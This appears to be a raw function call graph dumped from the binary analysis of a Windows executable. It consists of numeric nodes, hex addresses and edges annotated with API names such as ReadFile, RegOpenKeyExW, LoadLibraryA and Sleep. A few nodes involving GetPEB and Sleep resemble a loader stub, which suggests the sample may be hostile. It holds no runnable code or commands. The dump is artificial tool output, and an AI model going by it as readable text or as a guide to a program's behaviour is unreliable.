96105 3b4e8d 96103->96105 96106 3b4e7e 96104->96106 96108 3b4f80 96105->96108 96106->96105 96107 3b4e86 FreeLibrary 96106->96107 96107->96105 96109 3cfe0b 22 API calls 96108->96109 96110 3b4f95 96109->96110 96194 3b5722 96110->96194 96112 3b4fa1 __fread_nolock 96113 3f3d1d 96112->96113 96114 3b50a5 96112->96114 96122 3b4fdc 96112->96122 96208 42304d 74 API calls 96113->96208 96197 3b42a2 CreateStreamOnHGlobal 96114->96197 96117 3f3d22 96119 3b511f 64 API calls 96117->96119 96118 3b50f5 40 API calls 96118->96122 96120 3f3d45 96119->96120 96121 3b50f5 40 API calls 96120->96121 96124 3b506e ISource 96121->96124 96122->96117 96122->96118 96122->96124 96203 3b511f 96122->96203 96124->95900 96126 3b5107 96125->96126 96127 3f3d70 96125->96127 96230 3de8c4 96126->96230 96130 4228fe 96372 42274e 96130->96372 96132 422919 96132->95907 96136 3de536 __FrameHandler3::FrameUnwindToState 96133->96136 96134 3de544 96158 3df2d9 20 API calls __dosmaperr 96134->96158 96136->96134 96138 3de574 96136->96138 96137 3de549 96159 3e27ec 26 API calls __wsopen_s 96137->96159 96140 3de579 96138->96140 96141 3de586 96138->96141 96160 3df2d9 20 API calls __dosmaperr 96140->96160 96150 3e8061 96141->96150 96144 3de554 __wsopen_s 96144->96102 96145 3de58f 96146 3de595 96145->96146 96147 3de5a2 96145->96147 96161 3df2d9 20 API calls __dosmaperr 96146->96161 96162 3de5d4 LeaveCriticalSection __fread_nolock 96147->96162 96151 3e806d __FrameHandler3::FrameUnwindToState 96150->96151 96163 3e2f5e EnterCriticalSection 96151->96163 96153 3e807b 96164 3e80fb 96153->96164 96157 3e80ac __wsopen_s 96157->96145 96158->96137 96159->96144 96160->96144 96161->96144 96162->96144 96163->96153 96165 3e811e 96164->96165 96166 3e8177 96165->96166 96173 3e8088 96165->96173 96181 3d918d EnterCriticalSection 96165->96181 96182 3d91a1 LeaveCriticalSection 96165->96182 96183 3e4c7d 20 API calls 2 library calls 96166->96183 96168 3e8180 96184 3e29c8 96168->96184 96171 3e8189 96171->96173 96190 3e3405 11 API calls 2 library calls 96171->96190 96178 3e80b7 96173->96178 96174 3e81a8 96191 3d918d EnterCriticalSection 96174->96191 96177 3e81bb 96177->96173 96193 3e2fa6 LeaveCriticalSection 96178->96193 96180 3e80be 96180->96157 96181->96165 96182->96165 96183->96168 96185 3e29d3 RtlFreeHeap 96184->96185 96189 3e29fc __dosmaperr 96184->96189 96186 3e29e8 96185->96186 96185->96189 96192 3df2d9 20 API calls __dosmaperr 96186->96192 96188 3e29ee GetLastError 96188->96189 96189->96171 96190->96174 96191->96177 96192->96188 96193->96180 96195 3cfddb 22 API calls 96194->96195 96196 3b5734 96195->96196 96196->96112 96198 3b42bc FindResourceExW 96197->96198 96202 3b42d9 96197->96202 96199 3f35ba LoadResource 96198->96199 96198->96202 96200 3f35cf SizeofResource 96199->96200 96199->96202 96201 3f35e3 LockResource 96200->96201 96200->96202 96201->96202 96202->96122 96204 3b512e 96203->96204 96205 3f3d90 96203->96205 96209 3dece3 96204->96209 96208->96117 96212 3deaaa 96209->96212 96211 3b513c 96211->96122 96215 3deab6 __FrameHandler3::FrameUnwindToState 96212->96215 96213 3deac2 96225 3df2d9 20 API calls __dosmaperr 96213->96225 96215->96213 96216 3deae8 96215->96216 96227 3d918d EnterCriticalSection 96216->96227 96218 3deac7 96226 3e27ec 26 API calls __wsopen_s 96218->96226 96219 3deaf4 96228 3dec0a 62 API calls 2 library calls 96219->96228 96222 3deb08 96229 3deb27 LeaveCriticalSection __fread_nolock 96222->96229 96224 3dead2 __wsopen_s 96224->96211 96225->96218 96226->96224 96227->96219 96228->96222 96229->96224 96233 3de8e1 96230->96233 96232 3b5118 96232->96130 96234 3de8ed __FrameHandler3::FrameUnwindToState 96233->96234 96235 3de92d 96234->96235 96236 3de900 ___scrt_fastfail 96234->96236 96238 3de925 __wsopen_s 96234->96238 96246 3d918d EnterCriticalSection 96235->96246 96260 3df2d9 20 API calls __dosmaperr 96236->96260 96238->96232 96239 3de937 96247 3de6f8 96239->96247 96242 3de91a 96261 3e27ec 26 API calls __wsopen_s 96242->96261 96246->96239 96251 3de70a ___scrt_fastfail 96247->96251 96253 3de727 96247->96253 96248 3de717 96335 3df2d9 20 API calls __dosmaperr 96248->96335 96250 3de71c 96336 3e27ec 26 API calls __wsopen_s 96250->96336 96251->96248 96251->96253 96258 3de76a __fread_nolock 96251->96258 96262 3de96c LeaveCriticalSection __fread_nolock 96253->96262 96254 3de886 ___scrt_fastfail 96338 3df2d9 20 API calls __dosmaperr 96254->96338 96258->96253 96258->96254 96263 3dd955 96258->96263 96270 3e8d45 96258->96270 96337 3dcf78 26 API calls 4 library calls 96258->96337 96260->96242 96261->96238 96262->96238 96264 3dd976 96263->96264 96265 3dd961 96263->96265 96264->96258 96339 3df2d9 20 API calls __dosmaperr 96265->96339 96267 3dd966 96340 3e27ec 26 API calls __wsopen_s 96267->96340 96269 3dd971 96269->96258 96271 3e8d6f 96270->96271 96272 3e8d57 96270->96272 96274 3e90d9 96271->96274 96279 3e8db4 96271->96279 96350 3df2c6 20 API calls __dosmaperr 96272->96350 96366 3df2c6 20 API calls __dosmaperr 96274->96366 96275 3e8d5c 96351 3df2d9 20 API calls __dosmaperr 96275->96351 96278 3e90de 96367 3df2d9 20 API calls __dosmaperr 96278->96367 96280 3e8d64 96279->96280 96282 3e8dbf 96279->96282 96286 3e8def 96279->96286 96280->96258 96352 3df2c6 20 API calls __dosmaperr 96282->96352 96283 3e8dcc 96368 3e27ec 26 API calls __wsopen_s 96283->96368 96285 3e8dc4 96353 3df2d9 20 API calls __dosmaperr 96285->96353 96289 3e8e08 96286->96289 96290 3e8e2e 96286->96290 96291 3e8e4a 96286->96291 96289->96290 96325 3e8e15 96289->96325 96354 3df2c6 20 API calls __dosmaperr 96290->96354 96357 3e3820 21 API calls 2 library calls 96291->96357 96293 3e8e33 96355 3df2d9 20 API calls __dosmaperr 96293->96355 96295 3e8e61 96298 3e29c8 _free 20 API calls 96295->96298 96301 3e8e6a 96298->96301 96299 3e8e3a 96356 3e27ec 26 API calls __wsopen_s 96299->96356 96300 3e8fb3 96303 3e9029 96300->96303 96306 3e8fcc GetConsoleMode 96300->96306 96304 3e29c8 _free 20 API calls 96301->96304 96305 3e902d ReadFile 96303->96305 96307 3e8e71 96304->96307 96308 3e9047 96305->96308 96309 3e90a1 GetLastError 96305->96309 96306->96303 96310 3e8fdd 96306->96310 96311 3e8e7b 96307->96311 96312 3e8e96 96307->96312 96308->96309 96315 3e901e 96308->96315 96313 3e90ae 96309->96313 96314 3e9005 96309->96314 96310->96305 96316 3e8fe3 ReadConsoleW 96310->96316 96358 3df2d9 20 API calls __dosmaperr 96311->96358 96360 3e9424 28 API calls __wsopen_s 96312->96360 96364 3df2d9 20 API calls __dosmaperr 96313->96364 96331 3e8e45 __fread_nolock 96314->96331 96361 3df2a3 20 API calls __dosmaperr 96314->96361 96328 3e906c 96315->96328 96329 3e9083 96315->96329 96315->96331 96316->96315 96321 3e8fff GetLastError 96316->96321 96317 3e29c8 _free 20 API calls 96317->96280 96321->96314 96323 3e8e80 96359 3df2c6 20 API calls __dosmaperr 96323->96359 96324 3e90b3 96365 3df2c6 20 API calls __dosmaperr 96324->96365 96341 3ef89b 96325->96341 96362 3e8a61 31 API calls 3 library calls 96328->96362 96330 3e909a 96329->96330 96329->96331 96363 3e88a1 29 API calls __wsopen_s 96330->96363 96331->96317 96334 3e909f 96334->96331 96335->96250 96336->96253 96337->96258 96338->96250 96339->96267 96340->96269 96342 3ef8a8 96341->96342 96343 3ef8b5 96341->96343 96369 3df2d9 20 API calls __dosmaperr 96342->96369 96346 3ef8c1 96343->96346 96370 3df2d9 20 API calls __dosmaperr 96343->96370 96345 3ef8ad 96345->96300 96346->96300 96348 3ef8e2 96371 3e27ec 26 API calls __wsopen_s 96348->96371 96350->96275 96351->96280 96352->96285 96353->96283 96354->96293 96355->96299 96356->96331 96357->96295 96358->96323 96359->96331 96360->96325 96361->96331 96362->96331 96363->96334 96364->96324 96365->96331 96366->96278 96367->96283 96368->96280 96369->96345 96370->96348 96371->96345 96375 3de4e8 96372->96375 96374 42275d 96374->96132 96378 3de469 96375->96378 96377 3de505 96377->96374 96379 3de48c 96378->96379 96380 3de478 96378->96380 96385 3de488 __alldvrm 96379->96385 96388 3e333f 11 API calls 2 library calls 96379->96388 96386 3df2d9 20 API calls __dosmaperr 96380->96386 96382 3de47d 96387 3e27ec 26 API calls __wsopen_s 96382->96387 96385->96377 96386->96382 96387->96385 96388->96385 96389->95947 96391 3b6382 96390->96391 96397 3b63b6 __fread_nolock 96390->96397 96392 3f4a82 96391->96392 96393 3b63a9 96391->96393 96391->96397 96394 3cfddb 22 API calls 96392->96394 96401 3ba587 96393->96401 96396 3f4a91 96394->96396 96398 3cfe0b 22 API calls 96396->96398 96397->95958 96399 3f4ac5 __fread_nolock 96398->96399 96400->95959 96402 3ba59d 96401->96402 96405 3ba598 __fread_nolock 96401->96405 96403 3cfe0b 22 API calls 96402->96403 96404 3ff80f 96402->96404 96403->96405 96405->96397 96406->96000 96407->96002 96408->96053 96410 3ddbc1 96409->96410 96416 3ddbdd 96409->96416 96411 3ddbcd 96410->96411 96412 3ddbe3 96410->96412 96410->96416 96474 3df2d9 20 API calls __dosmaperr 96411->96474 96471 3dd9cc 96412->96471 96415 3ddbd2 96475 3e27ec 26 API calls __wsopen_s 96415->96475 96416->96065 96419 3de684 __FrameHandler3::FrameUnwindToState 96418->96419 96420 3de6aa 96419->96420 96421 3de695 96419->96421 96430 3de6a5 __wsopen_s 96420->96430 96610 3d918d EnterCriticalSection 96420->96610 96627 3df2d9 20 API calls __dosmaperr 96421->96627 96423 3de69a 96628 3e27ec 26 API calls __wsopen_s 96423->96628 96426 3de6c6 96611 3de602 96426->96611 96428 3de6d1 96629 3de6ee LeaveCriticalSection __fread_nolock 96428->96629 96430->96057 96432 423013 96431->96432 96433 422fff SetFileTime CloseHandle 96431->96433 96432->96035 96433->96432 96438 422e7a 96434->96438 96435 4229c4 96435->96035 96440 3dd583 26 API calls 96435->96440 96436 3b50f5 40 API calls 96436->96438 96437 4228fe 27 API calls 96437->96438 96438->96435 96438->96436 96438->96437 96439 3b511f 64 API calls 96438->96439 96439->96438 96440->96036 96441->96044 96443 4222e7 96442->96443 96444 4222d9 96442->96444 96446 42232c 96443->96446 96447 3de5eb 29 API calls 96443->96447 96457 4222f0 96443->96457 96445 3de5eb 29 API calls 96444->96445 96445->96443 96703 422557 96446->96703 96448 422311 96447->96448 96448->96446 96450 42231a 96448->96450 96454 3de678 67 API calls 96450->96454 96450->96457 96451 422370 96452 422374 96451->96452 96453 422395 96451->96453 96456 422381 96452->96456 96459 3de678 67 API calls 96452->96459 96707 422171 96453->96707 96454->96457 96456->96457 96460 3de678 67 API calls 96456->96460 96457->96063 96457->96070 96458 42239d 96461 4223c3 96458->96461 96462 4223a3 96458->96462 96459->96456 96460->96457 96714 4223f3 96461->96714 96464 3de678 67 API calls 96462->96464 96466 4223b0 96462->96466 96464->96466 96465 4223ca 96468 4223de 96465->96468 96469 3de678 67 API calls 96465->96469 96466->96457 96467 3de678 67 API calls 96466->96467 96467->96457 96468->96457 96470 3de678 67 API calls 96468->96470 96469->96468 96470->96457 96476 3dd97b 96471->96476 96473 3dd9f0 96473->96416 96474->96415 96475->96416 96477 3dd987 __FrameHandler3::FrameUnwindToState 96476->96477 96484 3d918d EnterCriticalSection 96477->96484 96479 3dd995 96485 3dd9f4 96479->96485 96483 3dd9b3 __wsopen_s 96483->96473 96484->96479 96493 3e49a1 96485->96493 96491 3dd9a2 96492 3dd9c0 LeaveCriticalSection __fread_nolock 96491->96492 96492->96483 96494 3dd955 __fread_nolock 26 API calls 96493->96494 96495 3e49b0 96494->96495 96496 3ef89b __fread_nolock 26 API calls 96495->96496 96497 3e49b6 96496->96497 96501 3dda09 96497->96501 96514 3e3820 21 API calls 2 library calls 96497->96514 96499 3e4a15 96500 3e29c8 _free 20 API calls 96499->96500 96500->96501 96502 3dda3a 96501->96502 96505 3dda4c 96502->96505 96508 3dda24 96502->96508 96503 3dda5a 96540 3df2d9 20 API calls __dosmaperr 96503->96540 96505->96503 96505->96508 96509 3dda85 __fread_nolock 96505->96509 96506 3dda5f 96541 3e27ec 26 API calls __wsopen_s 96506->96541 96513 3e4a56 62 API calls 96508->96513 96509->96508 96511 3dd955 __fread_nolock 26 API calls 96509->96511 96515 3e59be 96509->96515 96542 3ddc0b 96509->96542 96511->96509 96513->96491 96514->96499 96516 3e59ca __FrameHandler3::FrameUnwindToState 96515->96516 96517 3e59d2 96516->96517 96522 3e59ea 96516->96522 96602 3df2c6 20 API calls __dosmaperr 96517->96602 96519 3e5a88 96607 3df2c6 20 API calls __dosmaperr 96519->96607 96520 3e59d7 96603 3df2d9 20 API calls __dosmaperr 96520->96603 96522->96519 96525 3e5a1f 96522->96525 96524 3e5a8d 96608 3df2d9 20 API calls __dosmaperr 96524->96608 96548 3e5147 EnterCriticalSection 96525->96548 96528 3e5a95 96609 3e27ec 26 API calls __wsopen_s 96528->96609 96529 3e5a25 96531 3e5a56 96529->96531 96532 3e5a41 96529->96532 96549 3e5aa9 96531->96549 96604 3df2d9 20 API calls __dosmaperr 96532->96604 96533 3e59df __wsopen_s 96533->96509 96536 3e5a46 96605 3df2c6 20 API calls __dosmaperr 96536->96605 96537 3e5a51 96606 3e5a80 LeaveCriticalSection __wsopen_s 96537->96606 96540->96506 96541->96508 96543 3ddc23 96542->96543 96547 3ddc1f 96542->96547 96544 3dd955 __fread_nolock 26 API calls 96543->96544 96543->96547 96545 3ddc43 96544->96545 96546 3e59be __wsopen_s 62 API calls 96545->96546 96546->96547 96547->96509 96548->96529 96550 3e5ad7 96549->96550 96587 3e5ad0 96549->96587 96551 3e5afa 96550->96551 96552 3e5adb 96550->96552 96556 3e5b4b 96551->96556 96557 3e5b2e 96551->96557 96553 3df2c6 __dosmaperr 20 API calls 96552->96553 96555 3e5ae0 96553->96555 96554 3d0a8c __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 96558 3e5cb1 96554->96558 96559 3df2d9 __dosmaperr 20 API calls 96555->96559 96560 3e5b61 96556->96560 96563 3e9424 __wsopen_s 28 API calls 96556->96563 96561 3df2c6 __dosmaperr 20 API calls 96557->96561 96558->96537 96562 3e5ae7 96559->96562 96564 3e564e __wsopen_s 39 API calls 96560->96564 96565 3e5b33 96561->96565 96566 3e27ec __wsopen_s 26 API calls 96562->96566 96563->96560 96567 3e5b6a 96564->96567 96568 3df2d9 __dosmaperr 20 API calls 96565->96568 96566->96587 96569 3e5b6f 96567->96569 96570 3e5ba8 96567->96570 96587->96554 96602->96520 96603->96533 96604->96536 96605->96537 96606->96533 96607->96524 96608->96528 96609->96533 96610->96426 96612 3de60f 96611->96612 96613 3de624 96611->96613 96649 3df2d9 20 API calls __dosmaperr 96612->96649 96615 3ddc0b 62 API calls 96613->96615 96620 3de61f 96613->96620 96617 3de638 96615->96617 96616 3de614 96650 3e27ec 26 API calls __wsopen_s 96616->96650 96630 3e4d7a 96617->96630 96620->96428 96622 3dd955 __fread_nolock 26 API calls 96623 3de646 96622->96623 96634 3e862f 96623->96634 96626 3e29c8 _free 20 API calls 96626->96620 96627->96423 96628->96430 96629->96430 96631 3e4d90 96630->96631 96633 3de640 96630->96633 96632 3e29c8 _free 20 API calls 96631->96632 96631->96633 96632->96633 96633->96622 96635 3e863e 96634->96635 96636 3e8653 96634->96636 96654 3df2c6 20 API calls __dosmaperr 96635->96654 96638 3e868e 96636->96638 96642 3e867a 96636->96642 96656 3df2c6 20 API calls __dosmaperr 96638->96656 96639 3e8643 96655 3df2d9 20 API calls __dosmaperr 96639->96655 96651 3e8607 96642->96651 96643 3e8693 96657 3df2d9 20 API calls __dosmaperr 96643->96657 96646 3de64c 96646->96620 96646->96626 96647 3e869b 96658 3e27ec 26 API calls __wsopen_s 96647->96658 96649->96616 96650->96620 96659 3e8585 96651->96659 96653 3e862b 96653->96646 96654->96639 96655->96646 96656->96643 96657->96647 96658->96646 96660 3e8591 __FrameHandler3::FrameUnwindToState 96659->96660 96670 3e5147 EnterCriticalSection 96660->96670 96662 3e859f 96663 3e85c6 96662->96663 96664 3e85d1 96662->96664 96671 3e86ae 96663->96671 96686 3df2d9 20 API calls __dosmaperr 96664->96686 96667 3e85cc 96687 3e85fb LeaveCriticalSection __wsopen_s 96667->96687 96669 3e85ee __wsopen_s 96669->96653 96670->96662 96688 3e53c4 96671->96688 96673 3e86c4 96701 3e5333 21 API calls 2 library calls 96673->96701 96674 3e86be 96674->96673 96675 3e86f6 96674->96675 96677 3e53c4 __wsopen_s 26 API calls 96674->96677 96675->96673 96678 3e53c4 __wsopen_s 26 API calls 96675->96678 96681 3e86ed 96677->96681 96682 3e8702 FindCloseChangeNotification 96678->96682 96679 3e871c 96680 3e873e 96679->96680 96702 3df2a3 20 API calls __dosmaperr 96679->96702 96680->96667 96684 3e53c4 __wsopen_s 26 API calls 96681->96684 96682->96673 96685 3e870e GetLastError 96682->96685 96684->96675 96685->96673 96686->96667 96687->96669 96689 3e53e6 96688->96689 96690 3e53d1 96688->96690 96693 3df2c6 __dosmaperr 20 API calls 96689->96693 96696 3e540b 96689->96696 96691 3df2c6 __dosmaperr 20 API calls 96690->96691 96692 3e53d6 96691->96692 96695 3df2d9 __dosmaperr 20 API calls 96692->96695 96694 3e5416 96693->96694 96697 3df2d9 __dosmaperr 20 API calls 96694->96697 96698 3e53de 96695->96698 96696->96674 96699 3e541e 96697->96699 96698->96674 96700 3e27ec __wsopen_s 26 API calls 96699->96700 96700->96698 96701->96679 96702->96680 96704 422565 __fread_nolock 96703->96704 96705 42257c 96703->96705 96704->96451 96706 3de8c4 __fread_nolock 40 API calls 96705->96706 96706->96704 96708 3dea0c ___std_exception_copy 21 API calls 96707->96708 96709 42217f 96708->96709 96710 3dea0c ___std_exception_copy 21 API calls 96709->96710 96711 422190 96710->96711 96712 3dea0c ___std_exception_copy 21 API calls 96711->96712 96713 42219c 96712->96713 96713->96458 96721 422408 96714->96721 96715 4224c0 96726 422724 96715->96726 96717 4221cc 40 API calls 96717->96721 96718 4224c7 96718->96465 96721->96715 96721->96717 96721->96718 96722 422606 96721->96722 96730 422269 40 API calls 96721->96730 96723 42261d 96722->96723 96725 422617 96722->96725 96723->96721 96723->96723 96725->96723 96731 4226d7 96725->96731 96727 422731 96726->96727 96728 422742 96726->96728 96729 3ddbb3 65 API calls 96727->96729 96728->96718 96729->96728 96730->96721 96732 422703 96731->96732 96733 422714 96731->96733 96734 3ddbb3 65 API calls 96732->96734 96733->96725 96734->96733 96736 3b33fe _wcslen 96735->96736 96737 3f311d 96736->96737 96738 3b3411 96736->96738 96740 3cfddb 22 API calls 96737->96740 96739 3ba587 22 API calls 96738->96739 96742 3b341e __fread_nolock 96739->96742 96741 3f3127 96740->96741 96743 3cfe0b 22 API calls 96741->96743 96742->96077 96744 3f3157 __fread_nolock 96743->96744 96745->96093 96747 41d4d5 96746->96747 96748 41dbdc GetFileAttributesW 96746->96748 96747->95347 96748->96747 96749 41dbe8 FindFirstFileW 96748->96749 96749->96747 96750 41dbf9 FindClose 96749->96750 96750->96747 96752 3b6270 22 API calls 96751->96752 96774 3b9eb5 96752->96774 96753 3b9fd2 96781 3ba4a1 96753->96781 96755 3b9fec 96755->95652 96758 3ff7c4 96793 4196e2 84 API calls __wsopen_s 96758->96793 96759 3ff699 96765 3cfddb 22 API calls 96759->96765 96761 3ba405 96761->96755 96794 4196e2 84 API calls __wsopen_s 96761->96794 96764 3ba6c3 22 API calls 96764->96774 96767 3ff754 96765->96767 96766 3ff7d2 96768 3ba4a1 22 API calls 96766->96768 96770 3cfe0b 22 API calls 96767->96770 96769 3ff7e8 96768->96769 96769->96755 96771 3ba12c __fread_nolock 96770->96771 96771->96758 96771->96761 96773 3ba587 22 API calls 96773->96774 96774->96753 96774->96758 96774->96759 96774->96761 96774->96764 96774->96771 96774->96773 96775 3baec9 22 API calls 96774->96775 96778 3ba4a1 22 API calls 96774->96778 96780 3b4573 41 API calls _wcslen 96774->96780 96790 3b48c8 23 API calls 96774->96790 96791 3b49bd 22 API calls __fread_nolock 96774->96791 96792 3ba673 22 API calls 96774->96792 96776 3ba0db CharUpperBuffW 96775->96776 96789 3ba673 22 API calls 96776->96789 96778->96774 96779->95656 96780->96774 96782 3ba52b 96781->96782 96787 3ba4b1 __fread_nolock 96781->96787 96784 3cfe0b 22 API calls 96782->96784 96783 3cfddb 22 API calls 96785 3ba4b8 96783->96785 96784->96787 96786 3cfddb 22 API calls 96785->96786 96788 3ba4d6 96785->96788 96786->96788 96787->96783 96788->96755 96789->96774 96790->96774 96791->96774 96792->96774 96793->96766 96794->96755 96796 3bae01 96795->96796 96799 3bae1c ISource 96795->96799 96797 3baec9 22 API calls 96796->96797 96798 3bae09 CharUpperBuffW 96797->96798 96798->96799 96799->95360 96801 3bacae 96800->96801 96803 3bacd1 96801->96803 96830 42359c 82 API calls __wsopen_s 96801->96830 96803->95401 96805 3ffadb 96804->96805 96806 3bad92 96804->96806 96807 3cfddb 22 API calls 96806->96807 96808 3bad99 96807->96808 96831 3badcd 96808->96831 96811->95412 96812->95408 96813->95408 96814->95364 96815->95415 96816->95378 96817->95415 96818->95415 96819->95401 96820->95401 96821->95401 96822->95401 96823->95401 96824->95401 96825->95391 96826->95415 96827->95402 96828->95409 96829->95415 96830->96803 96835 3baddd 96831->96835 96832 3badb6 96832->95401 96833 3cfddb 22 API calls 96833->96835 96834 3ba961 22 API calls 96834->96835 96835->96832 96835->96833 96835->96834 96836 3ba8c7 22 API calls 96835->96836 96837 3badcd 22 API calls 96835->96837 96836->96835 96837->96835 96838->95425 96839->95425 96840->95430 96841->95430 96842->95424 96843->95430 96844 3b105b 96849 3b344d 96844->96849 96846 3b106a 96880 3d00a3 29 API calls __onexit 96846->96880 96848 3b1074 96850 3b345d __wsopen_s 96849->96850 96851 3ba961 22 API calls 96850->96851 96852 3b3513 96851->96852 96881 3b3a5a 96852->96881 96854 3b351c 96888 3b3357 96854->96888 96857 3b33c6 22 API calls 96858 3b3535 96857->96858 96894 3b515f 96858->96894 96861 3ba961 22 API calls 96862 3b354d 96861->96862 96863 3ba6c3 22 API calls 96862->96863 96864 3b3556 RegOpenKeyExW 96863->96864 96865 3f3176 RegQueryValueExW 96864->96865 96868 3b3578 96864->96868 96866 3f320c RegCloseKey 96865->96866 96867 3f3193 96865->96867 96866->96868 96879 3f321e _wcslen 96866->96879 96869 3cfe0b 22 API calls 96867->96869 96868->96846 96870 3f31ac 96869->96870 96871 3b5722 22 API calls 96870->96871 96872 3f31b7 RegQueryValueExW 96871->96872 96873 3f31d4 96872->96873 96876 3f31ee ISource 96872->96876 96874 3b6b57 22 API calls 96873->96874 96874->96876 96875 3b4c6d 22 API calls 96875->96879 96876->96866 96877 3b9cb3 22 API calls 96877->96879 96878 3b515f 22 API calls 96878->96879 96879->96868 96879->96875 96879->96877 96879->96878 96880->96848 96900 3f1f50 96881->96900 96884 3b9cb3 22 API calls 96885 3b3a8d 96884->96885 96902 3b3aa2 96885->96902 96887 3b3a97 96887->96854 96889 3f1f50 __wsopen_s 96888->96889 96890 3b3364 GetFullPathNameW 96889->96890 96891 3b3386 96890->96891 96892 3b6b57 22 API calls 96891->96892 96893 3b33a4 96892->96893 96893->96857 96895 3b516e 96894->96895 96899 3b518f __fread_nolock 96894->96899 96897 3cfe0b 22 API calls 96895->96897 96896 3cfddb 22 API calls 96898 3b3544 96896->96898 96897->96899 96898->96861 96899->96896 96901 3b3a67 GetModuleFileNameW 96900->96901 96901->96884 96903 3f1f50 __wsopen_s 96902->96903 96904 3b3aaf GetFullPathNameW 96903->96904 96905 3b3ae9 96904->96905 96906 3b3ace 96904->96906 96907 3ba6c3 22 API calls 96905->96907 96908 3b6b57 22 API calls 96906->96908 96909 3b3ada 96907->96909 96908->96909 96912 3b37a0 96909->96912 96913 3b37ae 96912->96913 96914 3b93b2 22 API calls 96913->96914 96915 3b37c2 96914->96915 96915->96887 96916 403a41 96920 4210c0 96916->96920 96918 403a4c 96919 4210c0 53 API calls 96918->96919 96919->96918 96921 4210fa 96920->96921 96926 4210cd 96920->96926 96921->96918 96922 4210fc 96932 3cfa11 53 API calls 96922->96932 96924 421101 96925 3b7510 53 API calls 96924->96925 96927 421108 96925->96927 96926->96921 96926->96922 96926->96924 96929 4210f4 96926->96929 96928 3b6350 22 API calls 96927->96928 96928->96921 96931 3bb270 39 API calls 96929->96931 96931->96921 96932->96924 96933 35223b0 96947 3520000 96933->96947 96935 352246e 96950 35222a0 96935->96950 96953 35234a0 GetPEB 96947->96953 96949 352068b 96949->96935 96951 35222a9 Sleep 96950->96951 96952 35222b7 96951->96952 96954 35234ca 96953->96954 96954->96949 96955 3b1098 96960 3b42de 96955->96960 96959 3b10a7 96961 3ba961 22 API calls 96960->96961 96962 3b42f5 GetVersionExW 96961->96962 96963 3b6b57 22 API calls 96962->96963 96964 3b4342 96963->96964 96965 3b93b2 22 API calls 96964->96965 96974 3b4378 96964->96974 96966 3b436c 96965->96966 96968 3b37a0 22 API calls 96966->96968 96967 3b441b GetCurrentProcess IsWow64Process 96969 3b4437 96967->96969 96968->96974 96970 3b444f LoadLibraryA 96969->96970 96971 3f3824 GetSystemInfo 96969->96971 96972 3b449c GetSystemInfo 96970->96972 96973 3b4460 GetProcAddress 96970->96973 96977 3b4476 96972->96977 96973->96972 96976 3b4470 GetNativeSystemInfo 96973->96976 96974->96967 96975 3f37df 96974->96975 96976->96977 96978 3b447a FreeLibrary 96977->96978 96979 3b109d 96977->96979 96978->96979 96980 3d00a3 29 API calls __onexit 96979->96980 96980->96959 96981 3e90fa 96982 3e9107 96981->96982 96986 3e911f 96981->96986 97031 3df2d9 20 API calls __dosmaperr 96982->97031 96984 3e910c 97032 3e27ec 26 API calls __wsopen_s 96984->97032 96987 3e917a 96986->96987 96995 3e9117 96986->96995 97033 3efdc4 21 API calls 2 library calls 96986->97033 96988 3dd955 __fread_nolock 26 API calls 96987->96988 96990 3e9192 96988->96990 97001 3e8c32 96990->97001 96992 3e9199 96993 3dd955 __fread_nolock 26 API calls 96992->96993 96992->96995 96994 3e91c5 96993->96994 96994->96995 96996 3dd955 __fread_nolock 26 API calls 96994->96996 96997 3e91d3 96996->96997 96997->96995 96998 3dd955 __fread_nolock 26 API calls 96997->96998 96999 3e91e3 96998->96999 97000 3dd955 __fread_nolock 26 API calls 96999->97000 97000->96995 97002 3e8c3e __FrameHandler3::FrameUnwindToState 97001->97002 97003 3e8c5e 97002->97003 97004 3e8c46 97002->97004 97006 3e8d24 97003->97006 97011 3e8c97 97003->97011 97035 3df2c6 20 API calls __dosmaperr 97004->97035 97042 3df2c6 20 API calls __dosmaperr 97006->97042 97008 3e8c4b 97036 3df2d9 20 API calls __dosmaperr 97008->97036 97009 3e8d29 97043 3df2d9 20 API calls __dosmaperr 97009->97043 97014 3e8cbb 97011->97014 97015 3e8ca6 97011->97015 97013 3e8c53 __wsopen_s 97013->96992 97034 3e5147 EnterCriticalSection 97014->97034 97037 3df2c6 20 API calls __dosmaperr 97015->97037 97018 3e8cc1 97020 3e8cdd 97018->97020 97021 3e8cf2 97018->97021 97019 3e8cab 97038 3df2d9 20 API calls __dosmaperr 97019->97038 97039 3df2d9 20 API calls __dosmaperr 97020->97039 97026 3e8d45 __fread_nolock 38 API calls 97021->97026 97024 3e8cb3 97044 3e27ec 26 API calls __wsopen_s 97024->97044 97028 3e8ced 97026->97028 97027 3e8ce2 97040 3df2c6 20 API calls __dosmaperr 97027->97040 97041 3e8d1c LeaveCriticalSection __wsopen_s 97028->97041 97031->96984 97032->96995 97033->96987 97034->97018 97035->97008 97036->97013 97037->97019 97038->97024 97039->97027 97040->97028 97041->97013 97042->97009 97043->97024 97044->97013 97045 3bf7bf 97046 3bf7d3 97045->97046 97047 3bfcb6 97045->97047 97048 3bfcc2 97046->97048 97050 3cfddb 22 API calls 97046->97050 97082 3baceb 23 API calls ISource 97047->97082 97083 3baceb 23 API calls ISource 97048->97083 97052 3bf7e5 97050->97052 97052->97048 97053 3bf83e 97052->97053 97054 3bfd3d 97052->97054 97056 3c1310 239 API calls 97053->97056 97072 3bed9d ISource 97053->97072 97084 421155 22 API calls 97054->97084 97077 3bec76 ISource 97056->97077 97058 3bfef7 97064 3ba8c7 22 API calls 97058->97064 97058->97072 97059 3cfddb 22 API calls 97059->97077 97061 404600 97067 3ba8c7 22 API calls 97061->97067 97061->97072 97062 404b0b 97086 42359c 82 API calls __wsopen_s 97062->97086 97063 3ba8c7 22 API calls 97063->97077 97064->97072 97067->97072 97069 3d0242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 97069->97077 97070 3bfbe3 97070->97072 97074 404bdc 97070->97074 97079 3bf3ae ISource 97070->97079 97071 3ba961 22 API calls 97071->97077 97073 3d00a3 29 API calls pre_c_initialization 97073->97077 97087 42359c 82 API calls __wsopen_s 97074->97087 97076 404beb 97088 42359c 82 API calls __wsopen_s 97076->97088 97077->97058 97077->97059 97077->97061 97077->97062 97077->97063 97077->97069 97077->97070 97077->97071 97077->97072 97077->97073 97077->97076 97078 3d01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 97077->97078 97077->97079 97080 3c01e0 239 API calls 2 library calls 97077->97080 97081 3c06a0 41 API calls ISource 97077->97081 97078->97077 97079->97072 97085 42359c 82 API calls __wsopen_s 97079->97085 97080->97077 97081->97077 97082->97048 